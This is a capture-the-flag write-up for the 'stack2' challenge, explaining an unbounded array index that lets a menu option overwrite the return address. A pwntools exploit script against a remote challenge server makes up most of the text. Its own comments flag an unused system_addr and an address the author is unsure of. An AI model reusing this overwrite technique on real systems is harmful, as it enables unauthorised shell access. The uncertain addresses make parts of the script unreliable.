stack2

Running checksec shows that NX and canary are enabled.



Loading it into IDA shows a program that computes an average; it contains both system and the string /bin/bash.



There is a stack overflow: the index j is never constrained to be less than 100, so the overflow offset is 0x84.
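As an added illustration, not code from the challenge binary: the bound the program lacks, written in C. The array size 100 and the struct layout are assumptions; the post only gives the index name j and the bound.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#define MAX_NUMBERS 100   /* assumed size of the number array on the stack */

/* State of the "average" program: the array plus how many entries are live. */
struct numbers {
    int values[MAX_NUMBERS];
    size_t count;
};

/* "How many numbers you have": refuse counts the array cannot hold, so the
   stored count is a trustworthy bound for every later index check. */
bool numbers_init(struct numbers *n, long requested) {
    if (requested < 0 || requested > MAX_NUMBERS)
        return false;
    n->count = (size_t)requested;
    for (size_t i = 0; i < n->count; i++)
        n->values[i] = 0;
    return true;
}

/* Option 3, "change number": the writeup's bug is that j is never checked
   against the bound, so j = 0x84 reaches the saved return address. Here any
   index outside [0, count) is rejected before the write happens. */
bool numbers_change(struct numbers *n, long j, int value) {
    if (j < 0 || (size_t)j >= n->count)
        return false;
    n->values[j] = value;
    return true;
}

/* Average of the live entries; 0 when there are none. */
int numbers_average(const struct numbers *n) {
    if (n->count == 0)
        return 0;
    long sum = 0;
    for (size_t i = 0; i < n->count; i++)
        sum += n->values[i];
    return (int)(sum / (long)n->count);
}

int main(void) {
    struct numbers n;
    if (!numbers_init(&n, 1)) return 1;
    numbers_change(&n, 0, 1);
    printf("index 0x84 accepted: %s\n", numbers_change(&n, 0x84, 0x50) ? "yes" : "no");
    printf("average: %d\n", numbers_average(&n));
    return 0;
}
```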

Script

from pwn import *

system_addr = 0x080485AF   # noted from IDA; not used below (the four bytes written below spell 0x08048450)
leave_offset = 0x84        # overflow offset found above

def write_addr(addr, va):
    # Menu option 3 ("change number") stores one value at index addr;
    # since the index is never bounded, it can reach past the array.
    io.sendline("3")
    io.recvuntil("which number to change:\n")
    io.sendline(str(addr))
    io.recvuntil("new number:\n")
    io.sendline(str(va))
    io.recvuntil("5. exit\n")

io = remote('111.198.29.45', 34639)
io.recvuntil("How many numbers you have:\n")
io.sendline("1")
io.recvuntil("Give me your numbers\n")
io.sendline("1")
io.recvuntil("5. exit\n")

# Write system's address one byte at a time, little-endian
write_addr(leave_offset, 0x50)
write_addr(leave_offset + 1, 0x84)
write_addr(leave_offset + 2, 0x04)
write_addr(leave_offset + 3, 0x08)

# sh_addr 0x08048987 ?? I'm not sure about this one
leave_offset += 8
print(leave_offset)
write_addr(leave_offset, 0x87)
write_addr(leave_offset + 1, 0x89)
write_addr(leave_offset + 2, 0x04)
write_addr(leave_offset + 3, 0x08)

# Option 5 (exit) returns from the function through the overwritten return address
io.sendline("5")
io.interactive()
